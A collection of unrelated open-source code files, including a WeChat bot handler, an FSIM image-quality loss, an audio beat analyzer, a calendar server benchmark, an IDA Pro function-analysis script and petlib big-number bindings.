wechat_user = msg_dict.get('FromUserName', '')
if wechat_user != '':
SasUserWxUserDict[username] = wechat_user
WxUserSasUserDict[wechat_user] = username
wechat.get_user_manager().update_user_session(wechat_user, 'login', time.time())
return 'Login Successful'
return ''
def handle_cmd_logoff(parameters: str, flask_request: request, msg_dict: dict) -> str:
username = parameters.strip()
if username != '' and username in SasUserWxUserDict.keys():
wechat_user = SasUserWxUserDict[username]
wechat.get_user_manager().update_user_session(wechat_user, 'login', 0)
del SasUserWxUserDict[username]
del WxUserSasUserDict[wechat_user]
# ----------------------------------------------------------------------------------------------------------------------
def parse_command(text: str) -> (str, str):
parts = text.split(':')
command = (parts[0] if len(parts) > 0 else '').strip()
parameters = (parts[1] if len(parts) > 1 else '').strip()
return command, parameters
def handle_command(flask_request: request, msg_dict: dict) -> (bool, str):
content: str = msg_dict.get('Content', '')
command, parameters = parse_command(content)
if command == 'test':
return True, handle_cmd_test(parameters, flask_request, msg_dict)
if command == 'login':
return True, handle_cmd_login(parameters, flask_request, msg_dict)
if command == 'logoff':
return True, handle_cmd_logoff(parameters, flask_request, msg_dict)
return False, ''
def handle_analysis(flask_request: request, msg_dict: dict) -> (bool, str):
content = msg_dict.get('Content', '')
return True, ('<a href="http://172.16.58.3/analysis?security=%s">查看分析结果</a>' % content)
def handle_text_message(flask_request: request, msg_dict: dict) -> str:
ret, resp = handle_command(flask_request, msg_dict)
if ret:
return resp
ret, resp = handle_analysis(flask_request, msg_dict)
if ret:
return resp
return ''
# ----------------------------------------------------------------------------------------------------------------------
def handle_request(flask_request: request) -> str:
global wechat
return wechat.handle_request(flask_request)
# ----------------------------------------------------------------------------------------------------------------------
def load_config(config: Config):
wechat_token = config.get('wechat_token', '')
wechat_app_id = config.get('wechat_app_id', '')
wechat_app_secret = config.get('wechat_app_secret', '')
print('Load config - WeChat Token: %s' % wechat_token)
print('Load config - WeChat App ID: %s' % wechat_app_id)
print('Load config - WeChat App Secret: %s' % wechat_app_id)
global wechat
wechat.set_token(wechat_token)
wechat.set_app_id(wechat_app_id)
wechat.set_app_secret(wechat_app_secret)
def init(config: Config):
global wechat
wechat = WeChat()
load_config(config)
wechat.set_msg_handler('text', handle_text_message)
|
packages/python/pyfora/PureImplementationMappings.py | ufora/ufora | 571 | 12653466 | <reponame>ufora/ufora
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import imp
import importlib
import os
import sys
from pyfora.PureImplementationMapping import PureMappingRegistry
def typeOfInstance(i):
try:
return i.__class__
except AttributeError:
return type(i)
class PureImplementationMappings(object):
"""Collection of PureImplementationMapping objects"""
def __init__(self):
self.last_seen_sys_modules_len = 0
self.already_loaded = set()
self.mappings = []
self.pythonTypeToMapping = {}
self.pyforaTypeToMapping = {}
self.pythonInstanceIdsToMappingAndId = {}
self.opacity_by_module_name = {}
def isOpaqueModule(self, module):
"""Is this module a system module none of whose pieces has a valid mapping?
If so, then we can treat the entire module as unmappable and we don't need
to recurse into its interior when mapping its values.
"""
name = module.__name__
if name in self.opacity_by_module_name:
return self.opacity_by_module_name[name]
self.opacity_by_module_name[name] = self._isOpaqueModuleUncached(module)
return self.opacity_by_module_name[name]
def _isOpaqueModuleUncached(self, module):
self.load_pure_modules()
if module.__name__ in self.already_loaded:
#this module has pure elements.
return False
if "." in module.__name__ and module.__name__.split(".")[0] in self.already_loaded:
#this module has pure elements.
return False
if not hasattr(module, '__file__'):
#this is a builtin module, like 'sys'
return True
if not module.__file__.startswith(sys.prefix):
#this is user code
return False
return True
def addMapping(self, mapping):
self.mappings.append(mapping)
for mappableType in mapping.getMappablePythonTypes():
self.pythonTypeToMapping[mappableType] = mapping
for purePythonType in mapping.getPurePythonTypes():
self.pyforaTypeToMapping[purePythonType] = mapping
for instance in mapping.getMappableInstances():
self.pythonInstanceIdsToMappingAndId[id(instance)] = (mapping, instance)
def canMap(self, instance):
self.load_pure_modules()
return (
typeOfInstance(instance) in self.pythonTypeToMapping or
id(instance) in self.pythonInstanceIdsToMappingAndId
)
def canInvert(self, instance):
return typeOfInstance(instance) in self.pyforaTypeToMapping
def canInvertInstancesOf(self, classMapping):
return classMapping in self.pyforaTypeToMapping
def mappableInstanceToPure(self, instance):
if id(instance) in self.pythonInstanceIdsToMappingAndId:
mapper = self.pythonInstanceIdsToMappingAndId[id(instance)][0]
else:
mapper = self.pythonTypeToMapping[typeOfInstance(instance)]
return mapper.mapPythonInstanceToPyforaInstance(instance)
def pureInstanceToMappable(self, instance):
mapper = self.pyforaTypeToMapping[typeOfInstance(instance)]
return mapper.mapPyforaInstanceToPythonInstance(instance)
def load_pure_modules(self):
if len(sys.modules) <= self.last_seen_sys_modules_len:
return
loaded_modules = sys.modules.keys()
loaded_root_modules = set(m.split('.')[0] for m in loaded_modules)
for root in loaded_root_modules:
if root in self.already_loaded or root == 'pyfora':
continue
self.try_load_pure_module(root)
self.last_seen_sys_modules_len = len(sys.modules)
def addMappingsForModule(self, module_name):
for mapping in PureMappingRegistry.mappingsForRootModule(module_name):
self.addMapping(mapping)
self.already_loaded.add(module_name)
def try_load_pure_module(self, module_name):
try:
# first try to load a pyfora pure module, if one exists
importlib.import_module("pyfora.pure_modules.pure_" + module_name)
self.addMappingsForModule(module_name)
except ImportError:
pass
pyfora_path = os.getenv('PYFORAPATH')
if pyfora_path is None:
return
for mod in [module_name, "pure_" + module_name]:
path = os.path.join(pyfora_path, mod)
if os.path.exists(path) or os.path.exists(path + '.py'):
try:
load_args = imp.find_module(mod, pyfora_path)
imp.load_module("pyfora.user_pure_modules.pure_" + mod, *load_args)
self.addMappingsForModule(module_name)
except ImportError:
pass
|
api/views.py | annevandalfsen/screenbird | 121 | 12653478 | <filename>api/views.py
def config_record_on_account(request,account_id):
pass
def config_record_on_channel(request, channel_id):
pass
|
scripts/mesh/mesh_uploader.py | AlfiyaRF/cloud-pipeline | 126 | 12653490 | <gh_stars>100-1000
# Copyright 2017-2020 EPAM Systems, Inc. (https://www.epam.com/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from src.mesh_file_manager import MeshStructureFileManager
from src.mesh_parser import get_parser
from src.mesh_tree_uploader import get_uploader
from src.ontology_type import OntologyType
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--url", type=str, required=True)
parser.add_argument("--type", type=str, required=True)
parser.add_argument("--tmp_path", type=str, required=False)
args = parser.parse_args()
url_path = args.url
tmp_path = args.tmp_path
ontology_type = args.type
if ontology_type not in OntologyType.get_allowed():
raise RuntimeError("Unsupported ontology type '%s'. Allowed types: %s" %
(ontology_type, ", ".join(OntologyType.get_allowed())))
file_manager = MeshStructureFileManager(tmp_path, ontology_type)
try:
path = file_manager.download(url_path)
print("Mesh structure successfully downloaded to path '%s'" % path)
tree, root_id = get_parser(ontology_type).parse(path)
print("Mesh structure successfully parsed. Found '%d' records" % len(tree.nodes))
get_uploader(ontology_type, tree, root_id).upload_tree()
print("Mesh structure successfully uploaded!")
except Exception as e:
file_manager.delete()
raise e
file_manager.delete()
if __name__ == "__main__":
main()
|
loss/IQA/fsim.py | milesgray/CALAE | 203 | 12653495 | <reponame>milesgray/CALAE<gh_stars>100-1000
import numpy as np
import os
import sys
import torch
from torchvision import models,transforms
import torch.nn as nn
import torch.nn.functional as F
import inspect
from numpy.fft import fft2, ifft2, fftshift, ifftshift
import math
from .utils import abs, real, imag, downsample
def lowpassfilter(size, cutoff, n):
"""
Constructs a low-pass Butterworth filter:
f = 1 / (1 + (w/cutoff)^2n)
usage: f = lowpassfilter(sze, cutoff, n)
where: size is a tuple specifying the size of filter to construct
[rows cols].
cutoff is the cutoff frequency of the filter 0 - 0.5
n is the order of the filter, the higher n is the sharper
the transition is. (n must be an integer >= 1). Note
that n is doubled so that it is always an even integer.
The frequency origin of the returned filter is at the corners.
"""
if cutoff < 0. or cutoff > 0.5:
raise Exception('cutoff must be between 0 and 0.5')
elif n % 1:
raise Exception('n must be an integer >= 1')
if len(size) == 1:
rows = cols = size
else:
rows, cols = size
if (cols % 2):
xvals = np.arange(-(cols - 1) / 2.,
((cols - 1) / 2.) + 1) / float(cols - 1)
else:
xvals = np.arange(-cols / 2., cols / 2.) / float(cols)
if (rows % 2):
yvals = np.arange(-(rows - 1) / 2.,
((rows - 1) / 2.) + 1) / float(rows - 1)
else:
yvals = np.arange(-rows / 2., rows / 2.) / float(rows)
x, y = np.meshgrid(xvals, yvals, sparse=True)
radius = np.sqrt(x * x + y * y)
return ifftshift(1. / (1. + (radius / cutoff) ** (2. * n)))
def filtergrid(rows, cols):
# Set up u1 and u2 matrices with ranges normalised to +/- 0.5
u1, u2 = np.meshgrid(np.linspace(-0.5, 0.5, cols, endpoint=(cols % 2)),
np.linspace(-0.5, 0.5, rows, endpoint=(rows % 2)),
sparse=True)
# Quadrant shift to put 0 frequency at the top left corner
u1 = ifftshift(u1)
u2 = ifftshift(u2)
# Compute frequency values as a radius from centre (but quadrant shifted)
radius = np.sqrt(u1 * u1 + u2 * u2)
return radius, u1, u2
def phasecong2(im):
nscale = 4
norient = 4
minWaveLength = 6
mult = 2
sigmaOnf = 0.55
dThetaOnSigma = 1.2
k = 2.0
epsilon = .0001
thetaSigma = np.pi/norient/dThetaOnSigma
_, _, rows,cols = im.shape
imagefft = torch.rfft(im,2,onesided=False)
lp = lowpassfilter((rows,cols),.45,15)
radius, _, _ = filtergrid(rows, cols)
radius[0, 0] = 1.
logGaborList = []
logGaborDenom = 2. * np.log(sigmaOnf) ** 2.
for s in range(nscale):
wavelength = minWaveLength * mult ** s
fo = 1. / wavelength # Centre frequency of filter
logRadOverFo = (np.log(radius / fo))
logGabor = np.exp(-(logRadOverFo * logRadOverFo) / logGaborDenom)
logGabor *= lp # Apply the low-pass filter
logGabor[0, 0] = 0. # Undo the radius fudge
logGaborList.append(logGabor)
# Matrix of radii
cy = np.floor(rows/2)
cx = np.floor(cols/2)
y, x = np.mgrid[0:rows, 0:cols]
y = (y-cy)/rows
x = (x-cx)/cols
radius = np.sqrt(x**2 + y**2)
theta = np.arctan2(-y, x)
radius = ifftshift(radius) # Quadrant shift radius and theta so that filters
theta = ifftshift(theta) # are constructed with 0 frequency at the corners.
radius[0,0] = 1
sintheta = np.sin(theta)
costheta = np.cos(theta)
spreadList = []
for o in np.arange(norient):
angl = o*np.pi/norient # Filter angle.
ds = sintheta * math.cos(angl) - costheta * math.sin(angl) # Difference in sine.
dc = costheta * math.cos(angl) + sintheta * math.sin(angl) # Difference in cosine.
dtheta = np.abs(np.arctan2(ds,dc)) # Absolute angular distance.
# dtheta = np.minimum(dtheta*NumberAngles/2, math.pi)
spread = np.exp((-dtheta**2) / (2 * thetaSigma**2)); # Calculate the angular
spreadList.append(spread)
ifftFilterArray = [[],[],[],[]]
filterArray = [[],[],[],[]]
for o in np.arange(norient):
for s in np.arange(nscale):
filter = logGaborList[s] * spreadList[o]
filterArray[o].append(torch.from_numpy(filter).reshape(1,1,rows,cols).float().to(im.device))
ifftFilt = np.real(ifft2(filter))*math.sqrt(rows*cols)
ifftFilterArray[o].append(torch.from_numpy(ifftFilt).reshape(1,1,rows,cols).float().to(im.device))
EnergyAll = 0
AnAll = 0
for o in np.arange(norient):
sumE_ThisOrient = 0
sumO_ThisOrient = 0
sumAn_ThisOrient = 0
Energy = 0
MatrixEOList = []
for s in np.arange(nscale):
filter = filterArray[o][s]
c = imagefft * filter.unsqueeze(-1).repeat(1,1,1,1,2)
MatrixEO = torch.ifft(imagefft * filter.unsqueeze(-1).repeat(1,1,1,1,2), 2)
MatrixEOList.append(MatrixEO)
An = abs(MatrixEO) # Amplitude of even & odd filter response.
sumAn_ThisOrient = sumAn_ThisOrient + An # Sum of amplitude responses.
sumE_ThisOrient = sumE_ThisOrient + real(MatrixEO) # Sum of even filter convolution results.
sumO_ThisOrient = sumO_ThisOrient + imag(MatrixEO) # Sum of odd filter convolution results.
if s == 0:
EM_n = torch.sum(filter**2,dim=[1,2,3])
maxAn = An
else:
maxAn = torch.max(maxAn,An)
XEnergy = torch.sqrt(sumE_ThisOrient**2 + sumO_ThisOrient**2+1e-12) + epsilon
MeanE = sumE_ThisOrient / XEnergy
MeanO = sumO_ThisOrient / XEnergy
for s in np.arange(nscale):
EO = MatrixEOList[s]
E = real(EO)
O = imag(EO)
Energy = Energy + E*MeanE + O*MeanO - torch.abs(E*MeanO - O*MeanE)
meanE2n = torch.median((abs(MatrixEOList[0])**2).view(im.shape[0],-1),dim=1)[0] / -math.log(0.5)
noisePower = meanE2n/EM_n
EstSumAn2 = 0
for s in np.arange(nscale):
EstSumAn2 = EstSumAn2 + ifftFilterArray[o][s]**2
EstSumAiAj = 0
for si in np.arange(nscale-1):
for sj in np.arange(si+1,nscale):
EstSumAiAj = EstSumAiAj + ifftFilterArray[o][si]*ifftFilterArray[o][sj]
sumEstSumAn2 = torch.sum(EstSumAn2,dim=[1,2,3])
sumEstSumAiAj = torch.sum(EstSumAiAj,dim=[1,2,3])
EstNoiseEnergy2 = 2*noisePower*sumEstSumAn2 + 4*noisePower*sumEstSumAiAj
tau = torch.sqrt(EstNoiseEnergy2/2+1e-12)
EstNoiseEnergySigma = torch.sqrt( (2-math.pi/2)*tau**2 +1e-12)
T = tau*math.sqrt(math.pi/2) + k*EstNoiseEnergySigma
T = T/1.7
Energy = F.relu(Energy - T.view(-1,1,1,1))
EnergyAll = EnergyAll + Energy
AnAll = AnAll + sumAn_ThisOrient
ResultPC = EnergyAll / AnAll
return ResultPC
def fsim(imageRef, imageDis):
channels = imageRef.shape[1]
if channels == 3:
Y1 = (0.299 * imageRef[:,0,:,:] + 0.587 * imageRef[:,1,:,:] + 0.114 * imageRef[:,2,:,:]).unsqueeze(1)
Y2 = (0.299 * imageDis[:,0,:,:] + 0.587 * imageDis[:,1,:,:] + 0.114 * imageDis[:,2,:,:]).unsqueeze(1)
I1 = (0.596 * imageRef[:,0,:,:] - 0.274 * imageRef[:,1,:,:] - 0.322 * imageRef[:,2,:,:]).unsqueeze(1)
I2 = (0.596 * imageDis[:,0,:,:] - 0.274 * imageDis[:,1,:,:] - 0.322 * imageDis[:,2,:,:]).unsqueeze(1)
Q1 = (0.211 * imageRef[:,0,:,:] - 0.523 * imageRef[:,1,:,:] + 0.312 * imageRef[:,2,:,:]).unsqueeze(1)
Q2 = (0.211 * imageDis[:,0,:,:] - 0.523 * imageDis[:,1,:,:] + 0.312 * imageDis[:,2,:,:]).unsqueeze(1)
Y1, Y2 = downsample(Y1, Y2)
I1, I2 = downsample(I1, I2)
Q1, Q2 = downsample(Q1, Q2)
elif channels == 1:
Y1, Y2 = downsample(imageRef, imageDis)
else:
raise ValueError('channels error')
PC1 = phasecong2(Y1)
PC2 = phasecong2(Y2)
dx = torch.Tensor([[3, 0, -3], [10, 0, -10], [3, 0, -3]]).float()/16
dy = torch.Tensor([[3, 10, 3], [0, 0, 0], [-3, -10, -3]]).float()/16
dx = dx.reshape(1,1,3,3).to(imageRef.device)
dy = dy.reshape(1,1,3,3).to(imageRef.device)
IxY1 = F.conv2d(Y1, dx, stride=1, padding =1)
IyY1 = F.conv2d(Y1, dy, stride=1, padding =1)
gradientMap1 = torch.sqrt(IxY1**2 + IyY1**2+1e-12)
IxY2 = F.conv2d(Y2, dx, stride=1, padding =1)
IyY2 = F.conv2d(Y2, dy, stride=1, padding =1)
gradientMap2 = torch.sqrt(IxY2**2 + IyY2**2+1e-12)
T1 = 0.85
T2 = 160
PCSimMatrix = (2 * PC1 * PC2 + T1) / (PC1**2 + PC2**2 + T1)
gradientSimMatrix = (2*gradientMap1*gradientMap2 + T2)/(gradientMap1**2 + gradientMap2**2 + T2)
PCm = torch.max(PC1, PC2)
SimMatrix = gradientSimMatrix * PCSimMatrix * PCm
FSIM_val = torch.sum(SimMatrix,dim=[1,2,3]) / torch.sum(PCm,dim=[1,2,3])
if channels==1:
return FSIM_val
T3 = 200
T4 = 200
ISimMatrix = (2 * I1 * I2 + T3) / (I1**2 + I2**2 + T3)
QSimMatrix = (2 * Q1 * Q2 + T4) / (Q1**2 + Q2**2 + T4)
SimMatrixC = gradientSimMatrix * PCSimMatrix * PCm * \
torch.sign(gradientSimMatrix) * ((torch.abs(ISimMatrix * QSimMatrix)+1e-12) ** 0.03)
return torch.sum(SimMatrixC,dim=[1,2,3]) / torch.sum(PCm,dim=[1,2,3])
class FSIM(torch.nn.Module):
# Refer to https://sse.tongji.edu.cn/linzhang/IQA/FSIM/FSIM.htm
def __init__(self, channels=3):
super(FSIM, self).__init__()
def forward(self, y, x, as_loss=True):
assert x.shape == y.shape
x = x * 255
y = y * 255
if as_loss:
score = fsim(x, y)
return 1 - score.mean()
else:
with torch.no_grad():
score = fsim(x, y)
return score
if __name__ == '__main__':
from PIL import Image
import argparse
from utils import prepare_image
parser = argparse.ArgumentParser()
parser.add_argument('--ref', type=str, default='images/r0.png')
parser.add_argument('--dist', type=str, default='images/r1.png')
args = parser.parse_args()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
ref = prepare_image(Image.open(args.ref).convert("RGB"), repeatNum = 1).to(device)
dist = prepare_image(Image.open(args.dist).convert("RGB"), repeatNum = 1).to(device)
model = FSIM(channels=3).to(device)
score = model(dist, ref, as_loss=False)
print('score: %.4f' % score.item())
# score: 0.7843
|
AudioOwl/analyze.py | davisnando/AudioOwl | 178 | 12653511 | import librosa
import madmom
from madmom.features.beats import *
from scipy import signal
import numpy as np
def peak_picking(beat_times, total_samples, kernel_size, offset):
# smoothing the beat function
cut_off_norm = len(beat_times)/total_samples*100/2
b, a = signal.butter(1, cut_off_norm)
beat_times = signal.filtfilt(b, a, beat_times)
# creating a list of samples for the rnn beats
beat_samples = np.linspace(0, total_samples, len(beat_times), endpoint=True, dtype=int)
n_t_medians = signal.medfilt(beat_times, kernel_size=kernel_size)
offset = 0.01
peaks = []
for i in range(len(beat_times)-1):
if beat_times[i] > 0:
if beat_times[i] > beat_times[i-1]:
if beat_times[i] > beat_times[i+1]:
if beat_times[i] > (n_t_medians[i] + offset):
peaks.append(int(beat_samples[i]))
return peaks
def analyze(y, sr):
data = {}
# sample rate
data['sample_rate'] = sr
# getting duration in seconds
data['duration'] = librosa.get_duration(y=y, sr=sr)
# beats prediction
# rnn_processor = RNNBeatProcessor()
# beats = rnn_processor(y)
rnn_processor = RNNBeatProcessor(post_processor=None)
predictions = rnn_processor(y)
mm_processor = MultiModelSelectionProcessor(num_ref_predictions=None)
beats = mm_processor(predictions)
data['beat_samples'] = peak_picking(beats, len(y), 5, 0.01)
if len(data['beat_samples']) < 3:
data['beat_samples'] = peak_picking(beats, len(y), 25, 0.01)
if data['beat_samples'] == []:
data['beat_samples'] = [0]
data['number_of_beats'] = len(data['beat_samples'])
# tempo
data['tempo_float'] = (len(data['beat_samples'])-1)*60/data['duration']
data['tempo_int'] = int(data['tempo_float'])
# noisiness featues
data['zero_crossing'] = librosa.feature.zero_crossing_rate(y)[0].tolist()
data['noisiness_median'] = float(np.median(data['zero_crossing']))
data['noisiness_sum'] = sum( librosa.zero_crossings(y)/y.shape[0] )
# spectral features
notes = []
try:
chroma = librosa.feature.chroma_cqt(y, n_chroma=12, bins_per_octave=12, n_octaves=8, hop_length=512)
# CONVERSION TABLE
# 0 c 261.63
# 1 c# 277.18
# 2 d 293.66
# 3 d# 311.13
# 4 e 329.63
# 5 f 349.23
# 6 f# 369.99
# 7 g 392.00
# 8 g# 415.30
# 9 a 440.00
# 10 a# 466.16
# 11 b 493.88
for col in range(chroma.shape[1]):
notes.append(int(np.argmax(chroma[:,col])))
data['notes'] = notes
data['dominant_note'] = int(np.argmax(np.bincount(np.array(notes))))
except:
data['notes'] = [0]
data['dominant_note'] = 0
return data
|
contrib/performance/_event_change.py | backwardn/ccs-calendarserver | 462 | 12653525 | <gh_stars>100-1000
##
# Copyright (c) 2010-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Benchmark a server's handling of event summary changes.
"""
from itertools import count
from urllib2 import HTTPDigestAuthHandler
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.web.client import Agent
from twisted.web.http_headers import Headers
from twisted.web.http import NO_CONTENT
from httpauth import AuthHandlerAgent
from httpclient import StringProducer
from benchlib import initialize, sample
from _event_create import makeEvent
@inlineCallbacks
def measure(host, port, dtrace, attendeeCount, samples, fieldName,
replacer, eventPerSample=False):
user = password = "<PASSWORD>"
root = "/"
principal = "/"
calendar = "event-%s-benchmark" % (fieldName,)
authinfo = HTTPDigestAuthHandler()
authinfo.add_password(
realm="Test Realm",
uri="http://%s:%d/" % (host, port),
user=user,
passwd=password)
agent = AuthHandlerAgent(Agent(reactor), authinfo)
# Set up the calendar first
yield initialize(agent, host, port, user, password, root, principal, calendar)
if eventPerSample:
# Create an event for each sample that will be taken, so that no event
# is used for two different samples.
f = _selfish_sample
else:
# Just create one event and re-use it for all samples.
f = _generous_sample
data = yield f(
dtrace, replacer, agent, host, port, user, calendar, fieldName,
attendeeCount, samples)
returnValue(data)
@inlineCallbacks
def _selfish_sample(dtrace, replacer, agent, host, port, user, calendar, fieldName, attendeeCount, samples):
url = 'http://%s:%s/calendars/__uids__/%s/%s/%s-change-%%d.ics' % (
host, port, user, calendar, fieldName)
headers = Headers({"content-type": ["text/calendar"]})
events = [
# The organizerSequence here (1) may need to be a parameter.
# See also the makeEvent call below.
(makeEvent(i, 1, attendeeCount), url % (i,))
for i in range(samples)]
for (event, url) in events:
yield agent.request('PUT', url, headers, StringProducer(event))
# Sample changing the event according to the replacer.
samples = yield sample(
dtrace, samples,
agent, (('PUT', url, headers, StringProducer(replacer(event, i)))
for i, (event, url)
in enumerate(events)).next,
NO_CONTENT)
returnValue(samples)
@inlineCallbacks
def _generous_sample(dtrace, replacer, agent, host, port, user, calendar, fieldName, attendeeCount, samples):
url = 'http://%s:%s/calendars/__uids__/%s/%s/%s-change.ics' % (
host, port, user, calendar, fieldName)
headers = Headers({"content-type": ["text/calendar"]})
# See the makeEvent call above.
event = makeEvent(0, 1, attendeeCount)
yield agent.request('PUT', url, headers, StringProducer(event))
# Sample changing the event according to the replacer.
samples = yield sample(
dtrace, samples,
agent, (('PUT', url, headers, StringProducer(replacer(event, i)))
for i in count(1)).next,
NO_CONTENT)
returnValue(samples)
|
taint_analysis/path_analysis.py | k-karakatsanis/BootStomp | 354 | 12653528 | from idc import *
from idaapi import *
from idautils import *
from re import *
class FuncInfo:
name = ''
addr = 0
size = 0
cond_stmt = 0
loop_stmt = 0
class PathAnalyze:
def __init__(self):
self.all_func_info = []
def write_function_info(self):
with open('function_info.txt', 'w') as finfo:
finfo.write("# method_name, method_addr, method_size, condition_stmt, loop_stmt\n\nbase_addr:\n0x%X\n\nfunctions:\n" % SegStart(MinEA()))
for func_info in self.all_func_info:
finfo.write(func_info.name + ", " + "0x%X" % func_info.addr + ", " + str(func_info.size) + ", " + str(func_info.cond_stmt) + ", " + str(func_info.loop_stmt) + "\n")
def count_condition_and_loop_stmt(self, func_info):
cond_stmt = 0
loop_stmt = 0
cond_pattern = compile("if")
loop_pattern = compile("for|while")
try:
func_decompiled = decompile(func_info.addr)
func_body = func_decompiled.__str__()
func_info.cond_stmt = len(cond_pattern.findall(func_body))
func_info.loop_stmt = len(loop_pattern.findall(func_body))
except DecompilationFailure as hf:
pass
def populate_function_info(self):
functions = Functions()
for function in functions:
func_info = FuncInfo()
func_info.name = get_func_name(function)
func_info.addr = function
func_info.size = function
print "Analyzing %s at 0x%X" % (func_info.name, func_info.addr)
func = get_func(function)
func_info.size = func.size()
self.count_condition_and_loop_stmt(func_info)
self.all_func_info.append(func_info)
if __name__ == '__main__':
path_analyze = PathAnalyze()
path_analyze.populate_function_info()
path_analyze.write_function_info()
print "Done!" |
Chapter11/c11_18_sort_pandas.py | John-ye666/Python-for-Finance-Second-Edition | 236 | 12653545 | # -*- coding: utf-8 -*-
"""
Name : c11_18_sort_pandas.py
Book : Python for Finance (2nd ed.)
Publisher: Packt Publishing Ltd.
Author : <NAME>
Date : 6/6/2017
email : <EMAIL>
<EMAIL>
"""
import pandas as pd
a = pd.DataFrame([[9,4],[9,2],[1,-1]],columns=['A','B'])
print(a)
# sort by A ascedning, then B descending
b= a.sort_values(['A', 'B'], ascending=[1, 0])
print(b)
# sort by A and B, both ascedning
c= a.sort_values(['A', 'B'], ascending=[1, 1])
print(c) |
src/api-service/__app__/queue_updates/__init__.py | tonybaloney/onefuzz | 2,692 | 12653550 | <reponame>tonybaloney/onefuzz
#!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import json
import azure.functions as func
from ..onefuzzlib.updates import Update, execute_update
def main(msg: func.QueueMessage) -> None:
body = msg.get_body()
update = Update.parse_obj(json.loads(body))
execute_update(update)
|
petlib/bn.py | SignorMercurio/petlib | 112 | 12653587 | from .bindings import _FFI, _C, get_errors
from functools import wraps
from copy import copy, deepcopy
from binascii import hexlify, unhexlify # pylint: disable=unused-import
# Py2/3 compatibility
try:
from builtins import int # pylint: disable=redefined-builtin
from builtins import object # pylint: disable=redefined-builtin
except BaseException: # pylint: disable=bare-except
print("Cannot mock for docs")
try:
from future.utils import python_2_unicode_compatible
except Exception as e: # pylint: disable=broad-except
# An identity decorator
def python_2_unicode_compatible(x): return x
import pytest
def force_Bn(n):
"""A decorator that coerces the nth input to be a Big Number"""
def convert_nth(f):
# pylint: disable=star-args
@wraps(f)
def new_f(*args, **kwargs):
new_args = args
try:
if not n < len(args) or args[n].bn: # isinstance(args[n], Bn):
new_args = args
except BaseException:
# if not n < len(args):
# new_args = args
if isinstance(args[n], int):
r = Bn.from_num(args[n])
new_args = list(args)
new_args[n] = r
new_args = tuple(new_args)
else:
return NotImplemented
return f(*new_args, **kwargs)
return new_f
return convert_nth
def _check(return_val):
"""Checks the return code of the C calls"""
if __debug__:
if isinstance(return_val, int) and return_val == 1:
return
if isinstance(return_val, bool) and return_val == True:
return
if return_val == True and return_val == 1:
return
errs = get_errors()
raise Exception("BN exception: %s" % errs)
class BnCtx(object):
""" A Bn Context for use by the petlib library """
__slots__ = ['bnctx', '_C']
def __init__(self):
self._C = _C
self.bnctx = self._C.BN_CTX_new()
_check(self.bnctx != _FFI.NULL)
def __del__(self):
if self.bnctx is not None:
self._C.BN_CTX_free(self.bnctx)
class BnCtxNULL(BnCtx):
""" A Bn Context for use by the petlib library """
__slots__ = ['bnctx', '_C']
def __init__(self):
self._C = _C
self.bnctx = _FFI.NULL
def __del__(self):
pass
import threading
_thread_local = threading.local()
def get_ctx():
global _thread_local
try:
return _thread_local.ctx
except BaseException:
_thread_local.ctx = BnCtx()
return _thread_local.ctx
@python_2_unicode_compatible
class Bn(object):
"""The core Big Number class.
It supports all comparisons (<, <=, ==, !=, >=, >),
arithmetic operations (+, -, %, /, divmod, pow)
and copy operations (copy and deep copy). The right-hand
side operand may be a small native python integer (<2^64). """
__C = _C
# We know this class will keep minimal state
__slots__ = ['bn']
# -- static methods
@staticmethod
def from_num(num):
if isinstance(num, int):
return Bn(num)
elif isinstance(num, Bn):
return num
else:
# raise TypeError("Cannot coerce %s into a BN." % num)
return NotImplemented
@staticmethod
def from_decimal(sdec):
"""Creates a Big Number from a decimal string.
Args:
sdec (string): numeric string possibly starting with minus.
See Also:
str() produces a decimal string from a big number.
Example:
>>> hundred = Bn.from_decimal("100")
>>> str(hundred)
'100'
"""
ptr = _FFI.new("BIGNUM **")
read_bytes = _C.BN_dec2bn(ptr, sdec.encode("utf8"))
if read_bytes != len(sdec):
raise Exception("BN Error")
ret = Bn()
_C.BN_copy(ret.bn, ptr[0])
_C.BN_clear_free(ptr[0])
return ret
@staticmethod
def from_hex(shex):
"""Creates a Big Number from a hexadecimal string.
Args:
shex (string): hex (0-F) string possibly starting with minus.
See Also:
hex() produces a hexadecimal representation of a big number.
Example:
>>> Bn.from_hex("FF")
255
"""
ptr = _FFI.new("BIGNUM **")
read_bytes = _C.BN_hex2bn(ptr, shex.encode("utf8"))
if read_bytes != len(shex):
raise Exception("BN Error")
ret = Bn()
_C.BN_copy(ret.bn, ptr[0])
_C.BN_clear_free(ptr[0])
return ret
@staticmethod
def from_binary(sbin):
"""Creates a Big Number from a byte sequence representing the number in Big-endian 8 byte atoms. Only positive values can be represented as byte sequence, and the library user should store the sign bit separately.
Args:
sbin (string): a byte sequence.
Example:
>>> byte_seq = unhexlify(b"010203")
>>> Bn.from_binary(byte_seq)
66051
>>> (1 * 256**2) + (2 * 256) + 3
66051
"""
ret = Bn()
_C.BN_bin2bn(sbin, len(sbin), ret.bn)
return ret
@staticmethod
def get_prime(bits, safe=1):
"""
Builds a prime Big Number of length bits.
Args:
bits (int) -- the number of bits.
